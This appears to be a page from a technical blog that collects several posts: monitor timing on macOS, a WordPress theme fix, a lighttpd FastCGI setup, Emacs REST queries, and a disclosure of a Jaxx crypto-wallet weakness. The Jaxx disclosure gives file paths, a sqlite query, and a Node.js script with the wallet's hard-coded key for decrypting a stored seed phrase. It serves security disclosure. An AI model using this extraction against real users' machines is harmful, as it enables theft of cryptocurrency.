vxlabs

Driving the Dell U2713HM at 2650×1440 from the HDMI output of the HyperDrive USB-c dock with macOS SwitchResX

In a post from 2014, I showed how to drive the sub-standard HDMI input of the Dell U2713HM 27″ UltraSharp at a resolution of 2560×1440 from the HDMI 1.3 output of a Linux-running laptop.

Fast forward 3 years, and I found myself having to drive the exact same monitor at its native resolution via its (sub-standard) HDMI input from a 2017 MacBook Pro through the brilliant HyperDrive USB-C dock.

(Apple, USB-C is nice, but you really pushed it too far this time.)

Fortunately, using a shareware tool called SwitchResX and information from one of the comments on my previous post, this is possible.

Although one can import Linux ModeLine timings into SwitchResX, the previous timings refused to work. It looks like this is due to macOS refusing to apply monitor timings which exceed the EDID-reported maximum pixel clock of 170 MHz.

Fortunately, SwitchResX is able to generate new timings for reduced blanking (this is crucial to be able to drive this monitor at its full resolution in spite of its HDMI port technically not supporting this) given the resolution and the refresh rate.

Setting the refresh rate to 42 yields a pixel clock of 162 MHz. This screenshot shows you how:

43Hz was probably also possible, but 42 is the answer to life the universe and everything, so there’s that.

To be able to setup these custom timings, you have to disable System Integrity Protection temporarily by booting into the recovery partition.

Extracting the Jaxx 12-word wallet backup phrase.

Updates

Because this matter is still ongoing (Jaxx does not seem to want to fix this vulnerability), I have moved the updates here to the front. The original post is below.

2017-08-08 18:42 UTC

I have added the exact filesystem locations / paths to the relevant Jaxx local storage file to the demonstration section.

2017-06-20 07:51 UTC

Since the first publication of this post, Jaxx has publically stated several times that storing our wallets unsecurely is not a problem.

If that is indeed the case, why do all other reputable desktop wallets perform this encryption in the correct manner, thus safeguarding our wallets, and only Jaxx does not?

Desktop wallets that DO CORRECTLY ENCRYPT your wallet: Exodus, MyEtherWallet, geth, parity, electrum.
Desktop wallets that DO NOT CORRECTLY ENCRYPT your wallet: Jaxx.

(Jaxx “encrypts” the wallet seed, but with a hard-coded and easily extracted key, which means this is not encryption but rather obfuscation, which is not much better than no encryption.)

2017-06-13 10:14 UTC

Reader Imed reports in the comments below that the 4-digit user PIN is stored as an unsalted sha256 hash, which can easily be reversed using rainbow tables, for example via sites like CrackStation.

I have just confirmed with a test Jaxx installation that I am able to extract a configured PIN from the local storage database without Jaxx running of course.

2017-06-11 10:08 UTC

Daira Hopwood correctly points out in the comments that encrypting using the PIN would be too easily brute-forced. I have updated the post in two places to indicate that instead Jaxx does in fact need to implement support for a strong password. One can discuss whether to do this differently for the desktop (no sandboxing) than for mobile devices (usually good sandboxing).

2017-06-10 20:19 UTC

Based on this response by the Jaxx CTO on reddit, they are not planning to fix this vulnerability. If that is the case, I strongly recommend that you avoid the Jaxx wallet.

Introduction

I was curious how easy it would be to extract the 12-word wallet backup phrase from a Jaxx cryptocurrency wallet desktop app / chrome extension install.

After an hour or two of analysis, I can conclude that this is unfortunately far too easy.

Jaxx Chrome extension Eth UI. Throw-away address, don’t use.

Even when your Jaxx has a security PIN configured, anyone with 20 seconds of (network) access to your PC can extract your 12 word backup phrase and copy it down. Jaxx does not have to be running for this to happen.

With the 12 word backup phrase, they can later restore your wallet, including all of your private keys, on their own computers, and then proceed to transfer away all of your cryptocurrency.

The main problem is that the Jaxx software encrypts the mnemonic using a hard-coded encryption key, instead of making use of a strong user-supplied password. (As Daira Hopwood points out in the comments, using the PIN would not be sufficient.)

This means we can easily read and decrypt the full recovery phrase from local storage using sqlite3 and some straight-forward code.

I successfully tested this vulnerability on the Jaxx Chrome extension v1.2.17 and the Jaxx Linux desktop app 1.2.13.

Demonstration

To test this proof of concept, you will need node.js installed. Ensure that your Jaxx is PIN protected, just for fun. It won’t help.

On Linux or Mac, open the Jaxx local storage file using the sqlite3 tool, or if you prefer GUIs you can use sqlitebrowser. You can find this file at the following locations depending on your operating system, and whether you’re using the desktop app or the chrome extension:

Linux desktop: $HOME/.config/Jaxx/Local\ Storage/file__0.localstorage
Linux chrome extension: $HOME/.config/google-chrome/Default/Local Storage/chrome-extension_ancbofgphhmhcchnaognahmjfajaecmo_0.localstorage
macOS desktop: /Users/[username]/Library/Application Support/Jaxx/Local Storage/file__0.localstorage, thanks to Manuel in the comments;
Windows desktop: C:\Users\<Your Computer's User Name>\AppData\Roaming\Jaxx\Local Storage
Windows chrome extension: C:\Users\<Your Computer's User Name>\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_ancbofgphhmhcchnaognahmjfajaecmo_0.localstorage

At the sqlite3 prompt, do the following:

sqlite> select value from ItemTable where key="mnemonic";
ofvoUNhkw+zBN+nvxd1GoL/u1Stn1hyXChD9JvCVkNZgpp19mWY595fbiFjjRPNbw5xxNtzAJGUchr3mImHCsLqSx7aQxcCbo+VrqxBJ5+4=

(If you opted for sqlitebrowser, just copy out the value of the mnemonic key.)

Note the returned value down. This is Jaxx’s encrypted mnemonic which we shall decrypt into your 12 word backup phrase.

(If the returned string is too short in your case, try sqlitebrowser instead. In my case, sqlite3 works perfectly for the desktop Jaxx, but not the Chrome Jaxx, where I use either the chrome Dev Tools or sqlitebrowser to extract the string.)

Install crypto-js version 3.1.2 by doing either npm install crypto-js@3.1.2 or yarn add crypto-js@3.1.2, and then run the following code using node, after substituting the mnemonicEncrypted variable value with the one you extracted using sqlite3:

// Jaxx recovery phrase extraction by cpbotha@vxlabs.com 2017
// https://vxlabs.com/2017/06/10/extracting-the-jaxx-12-word-wallet-backup-phrase/

// you need v3.1.2 (same as latest jaxx) else you'll get invalid UTF-8 error
var CryptoJS = require('crypto-js');
var _key = "6Le0DgMTAAAAANokdfEial"; //length=22
var _iv  = "mHGFxENnZLbienLyALoi.e"; //length=22

var mnemonicEncrypted="ofvoUNhkw+zBN+nvxd1GoL/u1Stn1hyXChD9JvCVkNZgpp19mWY595fbiFjjRPNbw5xxNtzAJGUchr3mImHCsLqSx7aQxcCbo+VrqxBJ5+4=";

var _keyB;
var _ivB;

// js/vault/vault.js
function decryptSimple(encryptedTxt) {
    // not sure why jaxx does  this inside the function
    _keyB = CryptoJS.enc.Base64.parse(_key);
    _ivB = CryptoJS.enc.Base64.parse(_iv);    
    var decrypted = CryptoJS.AES.decrypt(encryptedTxt, _keyB, { iv: _ivB });
    var decryptedText = decrypted.toString(CryptoJS.enc.Utf8);
    return decryptedText;
}

console.log(decryptSimple(mnemonicEncrypted));

This should print out your 12 word backup phrase, in the case of this dummy setup I’m seeing “snake purity emerge blue subway lab loyal timber depth leg federal work” which is indeed correct.

How can we fix this?

The thing is, Jaxx is unfortunately one of the better cross-platform multi-currency wallets. Although it has a great UI, I personally don’t like Exodus, because they don’t let me manage more than one Ethereum address.

To mitigate the Jaxx security issue discussed here, keep the Jaxx desktop app’s local storage directory on an encrypted filesystem which you only mount when you’re using Jaxx, and unmount directly afterwards. This is what I’m currently doing using encfs.

If you prefer using the Chrome extension, you can try symlinking just the extension’s local storage file as it lives in Chrome’s global Local Storage directory.

Importantly, keep on encouraging Jaxx support to add support for using a strong user-supplied password as part of the encryption key (just like Exodus) with which they encrypt your mnemonic (recovery phrase) and all other sensitive values in local storage. Refer them to this post for more details. (See Daira Hopwood’s comment, using the PIN for encryption is not sufficient.)

Adding page sidebar to WordPress Twenty Seventeen theme.

The WordPress Twenty Seventeen theme was exactly what I needed to update the look and feel of the Visible Orbit project website, except for one thing: No sidebar on pages, only posts. For the Visible Orbit website, having the site information and navigation visible on the page-heavy site is quite important:

Getting the sidebar to show on pages seems to be a popular question online. Besides just hacking the source, the only nicely packaged solution is this plugin by Joachim Jensen. However, for that to render correctly, you have to set page layout to “one column”, but that setting is exposed only if your front page is static, which is not the case for the Visible Orbit site.

Enter Twenty Seventeen VisOrb, a super simple child theme I made for the project which is able to fix this issue even for sites with “latest posts” as the front page, the WordPress default. Simply unpack the whole twentyseventeen-visorb directory in your wp-content/themes folder, and select the theme from the Appearance – Themes menu.

Setting up FastCGI apps on WebFaction

For the high-resolution orbital slice viewer on the Visible Orbit website, I had to setup wlziipsrv, a fork of the iipsrv large tiled image server. This is a FastCGI app, which means that, unlike a normal CGI which is started up for each request, one runs a number of these processes in daemon mode, and the front-end webserver communicates with them using the fastcgi protocol.

The end-result is this web-based high-resolution image viewer, which you can use to explore several thousands of microsocopic slices of human eyes. This is slice 41 of the S2897L registered set:

To make a long story short, there was no documentation on how to do this on a WebFaction shared host, a problem this post will try to remedy.

The main idea of the solution is to compile and run the lighttpd web server as a custom app, and then to map the fastcgi URL to that app. You can then configure lighttpd to run your fastcgi app. In the following sections, I show you how to do this.

Configure custom app

Using the webfaction panel, create a custom app as shown in the following screenshot.

Note down the port number that webfaction has allocated for this app. We will setup lighttpd to listen at this port for local access by the frontend webfaction webserver.

Using the website configuration screen of the webfaction panel, associate your new custom app to the fastcgi URL that will be requested. In my case, I have configured the front-end code to invoke the wlziipsrv fastcgi by going to /cgi-bin/wlziipsrv.fcgi. The configuration looks like this:

Here you are telling webfaction that if any client requests /cgi-bin/wlziipsrv.fcgi, it should connect them with whatever’s running behind the specially allocated custom app port. Next we will make sure that lighttpd will answer those requests.

Configure lighttpd

After building lighttpd with:

cd lighttpd_source_dir
./configure --prefix=$HOME/opt
make install

I created a config file such as the following one in the new custom app directory. Most important is that server.port matches the port number webfaction assigned. I also gave the file a name which will probably not be used by other lighttpd users on the system, namely visorb-lighttpd.conf.

server.document-root = "/home/myusername/webapps/wp_visorb_2017/"

server.port = 22430

server.modules += ( "mod_fastcgi" )

var.mypath = "/home/myusername/webapps/visorb_iipsrv/"

# uncomment this and start with -D to debug requests as they
# come in
#debug.log-request-handling = "enable"

mimetype.assign = (
  ".html" => "text/html", 
  ".txt" => "text/plain",
  ".jpg" => "image/jpeg",
  ".png" => "image/png" 
)

# webfaction frontend strips away the path; we end up here with only /
# however, we KNOW it must be /cgi-bin/wlziipsrv.fcgi
fastcgi.server = ( "/" =>
  (( "socket" => var.mypath + "wlziipsrv-fastcgi.socket",
     "check-local" => "disable",
     "min-procs" => 1,
     "max-procs" => 1,
     "bin-path" => "/home/myusername/build/WlzIIPSrv/src/wlziipsrv.fcgi",
     "bin-environment" => (
        "LOGFILE" => var.mypath + "iipsrv.log",
        "VERBOSITY" => "5",
        "MAX_IMAGE_CACHE_SIZE" => "10",
        "FILENAME_PATTERN" => "_pyr_",
        "JPEG_QUALITY" => "50",
        "MAX_CVT" => "3000"
      )
  ))
)

Test lighttpd by doing:

~/opt/bin/lighttpd -t -f visorb-lighttpd.conf
~/opt/bin/lighttpd -D -f visorb-lighttpd.conf

This last command will keep lighttpd running in the foreground just so you can see any log messages. Press Ctrl-C to exit.

Setup cron to keep lighttpd running

Next we need to ensure that lighttpd is kept running. On webfaction, it seems that the only way to do this, is with a cronjob.

I made the following bash script that we will configure cron to invoke every 10 minutes. The script will start lighttpd if it is not already running.

#!/bin/bash

VO_RUNNING=$(ps ax | grep visorb-lighttpd | grep -v grep)

if [ -z "$VO_RUNNING" ];
then $HOME/opt/sbin/lighttpd -f $HOME/webapps/visorb_iipsrv/visorb-lighttpd.conf;
fi

I installed the script using crontab -e, adding the following line:

*/10 * * * * /home/myusername/webapps/visorb_iipsrv/maybe-start-lighttpd.sh

Summary

Using this method, you can reroute any fastcgi request to a custom app handled by lighttpd, and then have lighttpd manage the fastcgi processes.

For now this does exactly what I want. However, I can easily map multiple URLs to the same lighttpd using the webfaction panel. Ideally, I would then have the single lighttpd reroute to different fastcgi apps.

However, it seems that webfaction strips away the URL path information before passing the request on to lighttpd (this is what I saw in debug mode), which is why I currently have to map / to the wlziipsrv.fcgi in the lighttpd configuration. Fortunately, lighttpd is super light-weight (currently 1.4MB RSS), and having a separate lighttpd process per type of fastcgi application is more robust in any case.

Querying RESTful webservices into Emacs orgmode tables

In this post, I’ll show you how you can use Emacs and orgmode to query live data from any RESTful webservice, and then use that data in orgmode tables, a really great way to get live table-based calculation and display functionality in your rich orgmode-based documentation.

As an example, we will query live ticker data from the Kraken cryptocurrency exchange, and then use the current trading values of two different cryptocurrencies to calculate a fictitious investor’s position.

There’s a short YouTube video accompanying this post that demonstrates how the whole business works. Read on for more details!

RESTful webservice: Kraken ticker info

Ticker info can be easily and freely pulled from the Kraken API. For example, if you go to https://api.kraken.com/0/public/Ticker?pair=ETHEUR,XBTEUR using your browser, you should see returned JSON looking something like the following extremely redacted example:

{
   "error" : [],
   "result" : {
      "XXBTZEUR" : {
         "c" : [
            "2239.99000",
            "0.01870867"
         ],
         "a" : [
            "2239.99000",
            "3",
            "3.000"
         ],
      },
      "XETHZEUR" : {
         "c" : [
            "196.40030",
            "2.70918471"
         ],
         "a" : [
            "196.89291",
            "6",
            "6.000"
         ],
      }
   }
}

I can specify any number of pairs, but for the sake of exposition we’re going to work with Bitcoin in Euro, and Ethereum in Euro.

Query the ticker webservice using emacs-lisp

Next we’ll write some emacs-lisp code to embed in our orgmode file. In this case, this blog post is actually an orgmode file which I shall later export to wordpress.

The code makes use of TKF’s great request.el package, installable from MELPA. I started with one of the examples on the request.el github, and then used the shiny new let-alist macro to extract the first element of the c key (the last traded price) of the result - PAIR hierarchy.

The eth-eur and btc-eur pairs are stored in the cpb-kraken-etheur and cpb-kraken-xbteur variables respectively.

(require 'request)

(defun timestamp ()
  (format-time-string "%Y-%m-%dT%H:%M:%S"))

(request
 "https://api.kraken.com/0/public/Ticker"
 :params '(("pair" . "ETHEUR,XBTEUR"))
 :parser 'json-read
 :success (cl-function
           (lambda (&key data &allow-other-keys)
             ;; get out the last successful trade "c"
             (let-alist data
               (setq cpb-kraken-etheur
                     (string-to-number (aref .result.XETHZEUR.c 0)))
               (setq cpb-kraken-xbteur
                     (string-to-number (aref .result.XXBTZEUR.c 0)))
               (setq cpb-kraken-timestamp (timestamp))
               )
             (org-table-iterate-buffer-tables)
             (message "Retrieved Kraken ticker values at %s. ETHEUR: %f XBTEUR: %f"
                      cpb-kraken-timestamp cpb-kraken-etheur cpb-kraken-xbteur)
             )))

The code is embedded in this orgmode document using org-babel, i.e. in an emacs-lisp source code block:

#+BEGIN_SRC emacs-lisp :results none
(pretty lisp (code (that you see above ok?)))
#+END_SRC

Whenever I press C-c C-c with my cursor anywhere over the code, it will retrieve the current values into emacs-lisp variables, and the recalculate the table shown below.

Use the ticker data in a spreadsheet-like table

Next, we construct the orgmode table. If you have never done this with Emacs orgmode, you should try it. The UX for quickly making and maintaining text-mode tables is breathtaking. The table as you see it below is the HTML representation (generated by Emacs and orgmode) of the plaintext table as it lives in this org file:

coin	units	curr unit price	curr val	frac
eth	15.231	197.000000	3000.507	0.36
btc	2.335113	2252.100000	5258.9080	0.64
2017-06-03T14:10:14			8259.415

Everything in column 3 and to the right, and in the last row, is calculated based on the ticker values we have pulled in using the emacs-lisp code above. The table will update whenever I press C-c C-c on the embedded code block, as it ends with (org-table-iterate-buffer-tables), meaning to recalculate all tables in this file, until convergence.

The orgmode formula editor (shortcut C-c '), enables you to edit all cell formulas with live highlighting of the references. The editor interface looks like this:

# Field and Range Formulas
@2$3 = '(format "%f" cpb-kraken-etheur)
@2$4 = $2*$3
@2$5 = $4/@II$4;%.2f
@3$3 = '(format "%f" cpb-kraken-xbteur)
@3$4 = $2*$3
@3$5 = $4/@II$4;%.2f
@4$1 = '(format "%s" cpb-kraken-timestamp)
@4$4 = vsum(@I..@II)

As you can see, I pull in the three variables retrieved and calculated by the emacs-lisp code using snippets of lisp. The other formulas are the standard spreadsheet fair with an orgmode flavour. @2$3 for example refers to the third column in the second row.

I can make any number of tables in this same file, depending on values from either the lisp code, or other tables. As per usual, I can export the file to PDF, HTML, ODF or even to a wordpress site, as I’m doing right now.